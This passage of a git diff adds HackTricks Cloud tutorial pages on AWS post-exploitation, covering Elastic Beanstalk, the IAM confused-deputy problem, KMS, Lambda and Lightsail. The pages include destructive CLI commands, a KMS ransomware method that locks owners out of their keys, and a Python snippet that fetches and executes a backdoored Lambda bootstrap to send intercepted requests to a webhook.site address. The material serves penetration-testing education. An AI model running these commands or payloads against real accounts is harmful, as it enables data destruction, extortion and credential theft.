+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
new file mode 100644
index 0000000000..4856870bc6
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md
@@ -0,0 +1,121 @@
+# AWS - Elastic Beanstalk Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Elastic Beanstalk
+
+For more information:
+
+{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
+[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
+{% endcontent-ref %}
+
+### `elasticbeanstalk:DeleteApplicationVersion`
+
+{% hint style="info" %}
+TODO: Test if more permissions are required for this
+{% endhint %}
+
+An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
+```
+{% endcode %}
+
+**Potential Impact**: Disruption of application deployment and potential loss of application versions.
+
+### `elasticbeanstalk:TerminateEnvironment`
+
+{% hint style="info" %}
+TODO: Test if more permissions are required for this
+{% endhint %}
+
+An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk terminate-environment --environment-name my-existing-env
+```
+{% endcode %}
+
+**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
+
+### `elasticbeanstalk:DeleteApplication`
+
+{% hint style="info" %}
+TODO: Test if more permissions are required for this
+{% endhint %}
+
+An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
+```
+{% endcode %}
+
+**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss.
+
+### `elasticbeanstalk:SwapEnvironmentCNAMEs`
+
+{% hint style="info" %}
+TODO: Test if more permissions are required for this
+{% endhint %}
+
+An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior.
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2
+```
+{% endcode %}
+
+**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments.
+
+### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags`
+
+{% hint style="info" %}
+TODO: Test if more permissions are required for this
+{% endhint %}
+
+An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management.
+
+{% code overflow="wrap" %}
+```bash
+aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1
+
+aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
+```
+{% endcode %}
+
+**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
new file mode 100644
index 0000000000..7a73ed2bd1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md
@@ -0,0 +1,130 @@
+# AWS - IAM Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## IAM
+
+For more information about IAM access:
+
+{% content-ref url="../aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+## Confused Deputy Problem
+
+If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**.
+
+Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**.
+
+<figure><img src="../../../.gitbook/assets/image (95).png" alt=""><figcaption></figcaption></figure>
+
+However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**.
+
+Example:
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": {
+    "Effect": "Allow",
+    "Principal": {
+      "AWS": "Example Corp's AWS Account ID"
+    },
+    "Action": "sts:AssumeRole",
+    "Condition": {
+      "StringEquals": {
+        "sts:ExternalId": "12345"
+      }
+    }
+  }
+}
+```
+
+{% hint style="warning" %}
+For an attacker to exploit a confused deputy he will need to find somehow if principals of the current account can impersonate roles in other accounts.
+{% endhint %}
+
+### Unexpected Trusts
+
+#### Wildcard as principal
+
+```json
+{    
+    "Action": "sts:AssumeRole",
+    "Effect": "Allow",
+    "Principal": { "AWS": "*" },
+}
+```
+
+This policy **allows all AWS** to assume the role.
+
+#### Service as principal
+
+```json
+{    
+    "Action": "lambda:InvokeFunction",
+    "Effect": "Allow",
+    "Principal": { "Service": "apigateway.amazonaws.com" },
+    "Resource": "arn:aws:lambda:000000000000:function:foo"
+}
+```
+
+This policy **allows any account** to configure their apigateway to call this Lambda.
+
+#### S3 as principal
+
+```json
+"Condition": {
+"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" }, 
+    "StringEquals": {
+        "aws:SourceAccount": "123456789012"
+    }
+}
+```
+
+If an S3 bucket is given as a principal, because S3 buckets do not have an Account ID, if you **deleted your bucket and the attacker created** it in their own account, then they could abuse this.
+
+#### Not supported
+
+```json
+{
+    "Effect": "Allow",
+    "Principal": {"Service": "cloudtrail.amazonaws.com"},
+    "Action": "s3:PutObject",
+    "Resource": "arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
+}
+```
+
+A common way to avoid Confused Deputy problems is the use of a condition with `AWS:SourceArn` to check the origin ARN. However, **some services might not support that** (like CloudTrail according to some sources).
+
+## References
+
+* [https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html](https://docs.aws.amazon.com/IAM/latest/UserGuide/confused-deputy.html)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
new file mode 100644
index 0000000000..18859e4f37
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md
@@ -0,0 +1,163 @@
+# AWS - KMS Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-kms-enum.md" %}
+[aws-kms-enum.md](../aws-services/aws-kms-enum.md)
+{% endcontent-ref %}
+
+### Encrypt/Decrypt information
+
+`fileb://` and `file://` are URI schemes used in AWS CLI commands to specify the path to local files:
+
+* `fileb://:` Reads the file in binary mode, commonly used for non-text files.
+* `file://:` Reads the file in text mode, typically used for plain text files, scripts, or JSON that doesn't have special encoding requirements.
+
+{% hint style="success" %}
+Note that if you want to decrypt some data inside a file, the file must contain the binary data, not base64 encoded data. (fileb://)
+{% endhint %}
+
+* Using a **symmetric** key
+
+```bash
+# Encrypt data
+aws kms encrypt \
+    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
+    --plaintext fileb:///tmp/hello.txt \
+    --output text \
+    --query CiphertextBlob | base64 \
+    --decode > ExampleEncryptedFile
+
+# Decrypt data
+aws kms decrypt \
+    --ciphertext-blob fileb://ExampleEncryptedFile \
+    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
+    --output text \
+    --query Plaintext | base64 \
+    --decode
+```
+
+* Using a **asymmetric** key:
+
+```bash
+# Encrypt data
+aws kms encrypt \
+    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
+    --encryption-algorithm RSAES_OAEP_SHA_256 \
+    --plaintext fileb:///tmp/hello.txt \
+    --output text \
+    --query CiphertextBlob | base64 \
+    --decode > ExampleEncryptedFile
+
+# Decrypt data
+aws kms decrypt \
+    --ciphertext-blob fileb://ExampleEncryptedFile \
+    --encryption-algorithm RSAES_OAEP_SHA_256 \
+    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
+    --output text \
+    --query Plaintext | base64 \
+    --decode
+```
+
+### KMS Ransomware
+
+An attacker with privileged access over KMS could modify the KMS policy of keys and **grant his account access over them**, removing the access granted to the legit account.
+
+Then, the legit account users won't be able to access any informatcion of any service that has been encrypted with those keys, creating an easy but effective ransomware over the account.
+
+{% hint style="warning" %}
+Note that **AWS managed keys aren't affected** by this attack, only **Customer managed keys**.
+
+Also note the need to use the param **`--bypass-policy-lockout-safety-check`** (the lack of this option in the web console makes this attack only possible from the CLI).
+{% endhint %}
+
+```bash
+# Force policy change
+aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
+    --policy-name default \
+    --policy file:///tmp/policy.yaml \
+    --bypass-policy-lockout-safety-check
+
+{
+    "Id": "key-consolepolicy-3",
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "Enable IAM User Permissions",
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam::<your_own_account>:root"
+            },
+            "Action": "kms:*",
+            "Resource": "*"
+        }
+    ]
+}
+```
+
+{% hint style="danger" %}
+Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to **give the access back to original account, you won't be able**.
+{% endhint %}
+
+<figure><img src="../../../.gitbook/assets/image (77).png" alt=""><figcaption></figcaption></figure>
+
+### Generic KMS Ransomware
+
+#### Global KMS Ransomware
+
+There is another way to perform a global KMS Ransomware, which would involve the following steps:
+
+* Create a new **key with a key material** imported by the attacker
+* **Re-encrypt older data** encrypted with the previous version with the new one.
+* **Delete the KMS key**
+* Now only the attacker, who has the original key material could be able to decrypt the encrypted data
+
+### Destroy keys
+
+```bash
+# Destoy they key material previously imported making the key useless
+aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab
+
+# Schedule the destoy of a key (min wait time is 7 days)
+aws kms schedule-key-deletion \
+    --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
+    --pending-window-in-days 7
+```
+
+{% hint style="danger" %}
+Note that AWS now **prevents the previous actions from being performed from a cross account:**
+{% endhint %}
+
+<figure><img src="../../../.gitbook/assets/image (76).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
new file mode 100644
index 0000000000..f7bea8e862
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md
@@ -0,0 +1,55 @@
+# AWS - Lambda Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lambda
+
+For more information check:
+
+{% content-ref url="../../aws-services/aws-lambda-enum.md" %}
+[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md)
+{% endcontent-ref %}
+
+### Steal Others Lambda URL Requests
+
+If an attacker somehow manage to get RCE inside a Lambda he will be able to steal other users HTTP requests to the lambda. If the requests contain sensitive information (cookies, credentials...) he will be able to steal them.
+
+{% content-ref url="aws-warm-lambda-persistence.md" %}
+[aws-warm-lambda-persistence.md](aws-warm-lambda-persistence.md)
+{% endcontent-ref %}
+
+### Steal Others Lambda URL Requests & Extensions Requests
+
+Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+
+{% content-ref url="../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md" %}
+[aws-abusing-lambda-extensions.md](../../aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
new file mode 100644
index 0000000000..94ea216845
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md
@@ -0,0 +1,89 @@
+# AWS - Steal Lambda Requests
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lambda Flow
+
+<figure><img src="../../../../.gitbook/assets/image (341).png" alt=""><figcaption><p><a href="https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png">https://unit42.paloaltonetworks.com/wp-content/uploads/2019/10/lambda_poc_2_arch.png</a></p></figcaption></figure>
+
+1. **Slicer** is a process outside the container that **send** **invocations** to the **init** process.
+2. The init process listens on port **9001** exposing some interesting endpoints:
+   * **`/2018-06-01/runtime/invocation/next`** – get the next invocation event
+   * **`/2018-06-01/runtime/invocation/{invoke-id}/response`** – return the handler response for the invoke
+   * **`/2018-06-01/runtime/invocation/{invoke-id}/error`** – return an execution error
+3. **bootstrap.py** has a loop getting invocations from the init process and calls the users code to handle them (**`/next`**).
+4. Finally, **bootstrap.py** sends to init the **response**
+
+Note that bootstrap loads the user code as a module, so any code execution performed by the users code is actually happening in this process.
+
+## Stealing Lambda Requests
+
+The goal of this attack is to make the users code execute a malicious **`bootstrap.py`** process inside the **`bootstrap.py`** process that handle the vulnerable request. This way, the **malicious bootstrap** process will start **talking with the init process** to handle the requests while the **legit** bootstrap is **trapped** running the malicious one, so it won't ask for requests to the init process.
+
+This is a simple task to achieve as the code of the user is being executed by the legit **`bootstrap.py`** process. So the attacker could:
+
+* **Send a fake result of the current invocation to the init process**, so init thinks the bootstrap process is waiting for more invocations.
+  * A request must be sent to **`/${invoke-id}/response`**
+  * The invoke-id can be obtained from the stack of the legit **`bootstrap.py`** process using the [**inspect**](https://docs.python.org/3/library/inspect.html) python module (as [proposed here](https://github.com/twistlock/lambda-persistency-poc/blob/master/poc/switch_runtime.py)) or just requesting it again to **`/2018-06-01/runtime/invocation/next`** (as [proposed here](https://github.com/Djkusik/serverless_persistency_poc/blob/master/gcp/exploit_files/switcher.py)).
+* Execute a malicious **`boostrap.py`** which will handle the next invocations
+  * For stealthiness purposes it's possible to send the lambda invocations parameters to an attackers controlled C2 and then handle the requests as usual.
+  * For this attack, it's enough to get the original code of **`bootstrap.py`** from the system or [**github**](https://github.com/aws/aws-lambda-python-runtime-interface-client/blob/main/awslambdaric/bootstrap.py), add the malicious code and run it from the current lambda invocation.
+
+### Attack Steps
+
+1. Find a **RCE** vulnerability.
+2. Generate a **malicious** **bootstrap** (e.g. [https://raw.githubusercontent.com/carlospolop/lambda\_bootstrap\_switcher/main/backdoored\_bootstrap.py](https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py))
+3. **Execute** the malicious bootstrap.
+
+You can easily perform these actions running:
+
+```bash
+python3 <<EOF
+import os
+import urllib3
+
+# Download backdoored bootstrap
+http = urllib3.PoolManager()
+backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
+new_runtime = http.request('GET', backdoored_bootstrap_url).data
+
+# Load new bootstrap
+os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"
+
+exec(new_runtime)
+EOF
+```
+
+For more info check [https://github.com/carlospolop/lambda\_bootstrap\_switcher](https://github.com/carlospolop/lambda_bootstrap_switcher)
+
+## References
+
+* [https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/](https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md
new file mode 100644
index 0000000000..db17d6d72f
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md
@@ -0,0 +1,56 @@
+# AWS - Lightsail Post Exploitation
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lightsail
+
+For more information, check:
+
